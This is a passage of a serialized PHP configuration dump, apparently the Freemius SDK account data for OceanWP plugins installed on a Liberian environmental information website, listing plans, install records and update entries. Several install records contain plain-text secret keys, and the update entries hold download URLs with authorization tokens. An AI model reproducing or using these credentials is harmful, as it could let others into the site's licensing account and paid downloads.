wNTo1Ng==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:17:\"ocean-popup-login\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc2NA==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA2OQ==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowMjowNA==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowMTo1NA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:11:\"ocean-hooks\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc1OA==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:0:\"\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA3NQ==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNzoyMDo1NA==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowNDo1Mg==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:17:\"ocean-full-screen\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc2Ng==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA2Nw==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowMDo0OQ==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowMDoxNQ==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:20:\"ocean-footer-callout\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc1NA==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA3OQ==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowNzoxMg==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowNzowNA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:23:\"ocean-elementor-widgets\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc1Nw==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA3Ng==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowNTozMw==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowNToyMw==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:19:\"ocean-cookie-notice\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc2NQ==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA2OA==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowMTozMw==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowMToxOA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:15:\"ocean-pro-demos\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc5Nw==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjExNQ==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0xNCAxMjo0MTowMw==\";s:7:\"created\";s:28:\"MjAxOS0wNS0xNCAxMjo0MDowOQ==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}s:5:\"sites\";a:14:{s:20:\"ocean-custom-sidebar\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3810\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:0:\"\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:3:\"5.3\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.2.24\";s:7:\"plan_id\";s:4:\"6136\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_7fd78b9c84fa6f4095177bc157999\";s:10:\"secret_key\";s:32:\"sk_ld%sZmP]=cGc4Yz&@_BRHHDWY<]9*\";s:2:\"id\";s:7:\"3394417\";s:7:\"updated\";s:19:\"2019-11-14 23:16:17\";s:7:\"created\";s:19:\"2019-11-08 13:01:45\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:18:\"ocean-modal-window\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3814\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.1.0\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.5.3\";s:11:\"sdk_version\";s:5:\"2.4.1\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6140\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_50228d67db6493c222d33b6395b4f\";s:10:\"secret_key\";s:32:\"sk_64Xdlxd_V+o^){SI}7ci;f?f@b]gF\";s:2:\"id\";s:7:\"3394421\";s:7:\"updated\";s:19:\"2021-01-02 23:11:57\";s:7:\"created\";s:19:\"2019-11-08 13:02:01\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:18:\"ocean-posts-slider\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3813\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"2.0.0\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.5.5\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6139\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";b:0;s:10:\"public_key\";s:32:\"pk_a11fd475fb5b626bfe54f3e0867db\";s:10:\"secret_key\";s:32:\"sk_Pl6wn}ckGn^(>oD[rduIuM&:.OvrB\";s:2:\"id\";s:7:\"3394422\";s:7:\"updated\";s:19:\"2021-08-15 00:07:27\";s:7:\"created\";s:19:\"2019-11-08 13:02:05\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:20:\"ocean-social-sharing\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3807\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"2.0.0\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.5.5\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6132\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";b:0;s:10:\"public_key\";s:32:\"pk_e8e6f32bb115c416e539d6a92a326\";s:10:\"secret_key\";s:32:\"sk_uyYI<i=$A=a<qOCM;pL)~N3uquF%P\";s:2:\"id\";s:7:\"3393563\";s:7:\"updated\";s:19:\"2021-08-15 13:58:19\";s:7:\"created\";s:19:\"2019-11-08 10:06:06\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:19:\"ocean-sticky-header\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3755\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.2.0\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.3.4\";s:11:\"sdk_version\";s:5:\"2.3.2\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6078\";s:10:\"license_id\";s:6:\"250661\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_b6146999e3c64ae7d50ea339fbc81\";s:10:\"secret_key\";s:32:\"sk_OL=1o#kL)v0ySq$WPCduWI>1L[2]A\";s:2:\"id\";s:7:\"3394668\";s:7:\"updated\";s:19:\"2020-10-21 14:50:12\";s:7:\"created\";s:19:\"2019-11-08 13:42:39\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:17:\"ocean-white-label\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3762\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.0.6\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.3.4\";s:11:\"sdk_version\";s:5:\"2.3.2\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6071\";s:10:\"license_id\";s:6:\"250664\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_28cc060305251031c684ed4bdc6e2\";s:10:\"secret_key\";s:32:\"sk_Dvpa!}^4WUS$TZFD2-c}{Gr0^HMzW\";s:2:\"id\";s:7:\"3394709\";s:7:\"updated\";s:19:\"2020-10-21 14:48:12\";s:7:\"created\";s:19:\"2019-11-08 13:48:48\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:16:\"ocean-side-panel\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3756\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:0:\"\";s:3:\"url\";s:32:\"https://ekmsliberia.info_liberia\";s:7:\"version\";s:6:\"1.0.11\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.2.4\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.0.23\";s:7:\"plan_id\";s:4:\"6077\";s:10:\"license_id\";s:6:\"250666\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_94428769b765a4dae3a39c3c1066b\";s:10:\"secret_key\";s:32:\"sk_Qr1f@4t&>5v.y2woWx*lC:I1LiRd{\";s:2:\"id\";s:7:\"3394720\";s:7:\"updated\";s:19:\"2019-11-08 16:10:20\";s:7:\"created\";s:19:\"2019-11-08 13:50:46\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:17:\"ocean-popup-login\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3764\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.2.0\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.3.4\";s:11:\"sdk_version\";s:7:\"2.4.0.1\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6069\";s:10:\"license_id\";s:6:\"250672\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_f5d4e87abd4f651a13e838fdc34ee\";s:10:\"secret_key\";s:32:\"sk_kqmbKXU#O]kkYkLPE=A?[4T&L]~Ld\";s:2:\"id\";s:7:\"3394748\";s:7:\"updated\";s:19:\"2020-10-21 15:03:00\";s:7:\"created\";s:19:\"2019-11-08 13:57:31\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:11:\"ocean-hooks\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3758\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.1.2\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:3:\"5.3\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.2.24\";s:7:\"plan_id\";s:4:\"6075\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_8f7eb37fdb561d8fcceea47a19457\";s:10:\"secret_key\";s:32:\"sk_]C[{TmC.RZZt}xh5Uis=OAJ;4c6>D\";s:2:\"id\";s:7:\"3394756\";s:7:\"updated\";s:19:\"2019-11-20 00:24:17\";s:7:\"created\";s:19:\"2019-11-08 13:58:43\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:17:\"ocean-full-screen\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3766\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:41:\"Environmental Knowledge Management System\";s:3:\"url\";s:32:\"https://ekmsliberia.info_liberia\";s:7:\"version\";s:5:\"1.0.6\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.2.4\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.0.23\";s:7:\"plan_id\";s:4:\"6067\";s:10:\"license_id\";s:6:\"250674\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_17c62adcf60224832d138f3e24201\";s:10:\"secret_key\";s:32:\"sk_y0&TVxQB=FIW$!03qZh!Y.^iLm:Qw\";s:2:\"id\";s:7:\"3394771\";s:7:\"updated\";s:19:\"2019-11-11 16:25:11\";s:7:\"created\";s:19:\"2019-11-08 14:00:41\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:20:\"ocean-footer-callout\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3754\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:0:\"\";s:3:\"url\";s:32:\"https://ekmsliberia.info_liberia\";s:7:\"version\";s:6:\"1.0.13\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.2.4\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.0.23\";s:7:\"plan_id\";s:4:\"6079\";s:10:\"license_id\";s:6:\"250677\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_2c96d54216950fafb949d4905ee4c\";s:10:\"secret_key\";s:32:\"sk_LL-+[Uz0g21~FkZD:4)buSCs^bs~K\";s:2:\"id\";s:7:\"3394777\";s:7:\"updated\";s:19:\"2019-11-08 16:11:48\";s:7:\"created\";s:19:\"2019-11-08 14:02:01\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:23:\"ocean-elementor-widgets\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3757\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.2.3\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.3.4\";s:11:\"sdk_version\";s:7:\"2.4.0.1\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6076\";s:10:\"license_id\";s:6:\"250680\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_fc5895d06d50378b4588ee4bfbec1\";s:10:\"secret_key\";s:32:\"sk_zR!S9(}Sx]H&<GOSVzC]J@9F?FWg>\";s:2:\"id\";s:7:\"3394789\";s:7:\"updated\";s:19:\"2020-10-21 14:56:25\";s:7:\"created\";s:19:\"2019-11-08 14:03:39\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:19:\"ocean-cookie-notice\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3765\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:64:\"Official Website of the Environmental Knowledge Management Syste\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.3.4\";s:11:\"sdk_version\";s:7:\"2.4.0.1\";s:28:\"programming_language_version\";s:6:\"7.2.34\";s:7:\"plan_id\";s:4:\"6068\";s:10:\"license_id\";s:6:\"250681\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_1b3e46f6d50df003d0a0ecd4cfd40\";s:10:\"secret_key\";s:32:\"sk_wS;fI=kX=U7m_Td!(]K{Yk}pJHy-y\";s:2:\"id\";s:7:\"3394810\";s:7:\"updated\";s:19:\"2020-10-21 14:56:59\";s:7:\"created\";s:19:\"2019-11-08 14:05:12\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}s:15:\"ocean-pro-demos\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3797\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:0:\"\";s:3:\"url\";s:32:\"https://ekmsliberia.info_liberia\";s:7:\"version\";s:5:\"1.1.0\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"5.2.4\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.0.23\";s:7:\"plan_id\";s:4:\"6115\";s:10:\"license_id\";s:6:\"250683\";s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:1;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_8414822b9f482dfb6d1b5696d5ff3\";s:10:\"secret_key\";s:32:\"sk_.YS-%<9h&2r34xir>.dH0mVEqLGGv\";s:2:\"id\";s:7:\"3394820\";s:7:\"updated\";s:19:\"2019-11-08 14:06:59\";s:7:\"created\";s:19:\"2019-11-08 14:06:59\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}}s:7:\"updates\";a:11:{i:3755;O:13:\"FS_Plugin_Tag\":12:{s:7:\"version\";s:5:\"2.0.1\";s:3:\"url\";s:385:\"http://api.freemius.com/v1/installs/3394668/updates/32276.zip?is_premium=true&authorization=FSLA+3394668%3A-7aTOtpXqy2oymyrcpdWQdbA52lp7aGLEiwaVBrlo-_RlGArlKAVSSgeJ8FZt_grc72K1D49NgdbE_fXrrYLEwIHzFt1ult7bVrshx15_syiJkr0BCAtI9zFE0NwBG9kdmIasV7ZpcI9_xmdW3Y8NDmJiLLNyZ1E9ZYPu1KHPAP4PvGICNiXBPazTveapuUA57PQuKIEIn4FwqK1mJUW3jwZ83uOPdpemtJj3q9XMiE2wz5B3qv7R2-aNn3ohAsdFehONkyTlwqbeiPtdTXt0w\";s:25:\"requires_platform_version\";s:3:\"5.3\";s:37:\"requires_programming_language_version\";N;s:20:\"tested_up_to_version\";s:3:\"5.8\";s:8:\"has_free\";b:0;s:11:\"has_premium\";b:1;s:12:\"release_mode\";s:8:\"released\";s:2:\"id\";s:5:\"32276\";s:7:\"updated\";i:1629113547;s:7:\"created\";s:19:\"2021-07-21 10:48:45\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3752;N;i:3762;N;i:3756;N;i:3764;O:13:\"FS_Plugin_Tag\":12:{s:7:\"version\";s:5:\"2.0.0\";s:3:\"url\";s:385:\"http://api.freemius.com/v1/installs/3394748/updates/32216.zip?is_premium=true&authorization=FSLA+3394748%3AJ3cwxUCJALq9lliV5BgxQBGam3FMTQJ8nigkv_6Y5eDQteYeI55DnQ9_u2uX_1-6rPZwFeWaiBFARxhh7AMCUDhVd2SS7KHPGmPv1YJZ8ZbTVsjIMfNU3MBRfpamqh3braSx9w6HDfXD6928ViruPtInHj217WdBJJVAT3W8DR3dUX6UZSdoZcecYiosQ9o_qrJhS-Flc_G1fMRQaqFeELkSObLVQLjbXR06w1jYwpofAeb0VRwuTurkjv4XP2yqT7ZAtGyJ_ZSGvtELWpiqPQ\";s:25:\"requires_platform_version\";s:3:\"5.3\";s:37:\"requires_programming_language_version\";N;s:20:\"tested_up_to_version\";s:3:\"5.8\";s:8:\"has_free\";b:0;s:11:\"has_premium\";b:1;s:12:\"release_mode\";s:8:\"released\";s:2:\"id\";s:5:\"32216\";s:7:\"updated\";i:1629113547;s:7:\"created\";s:19:\"2021-07-20 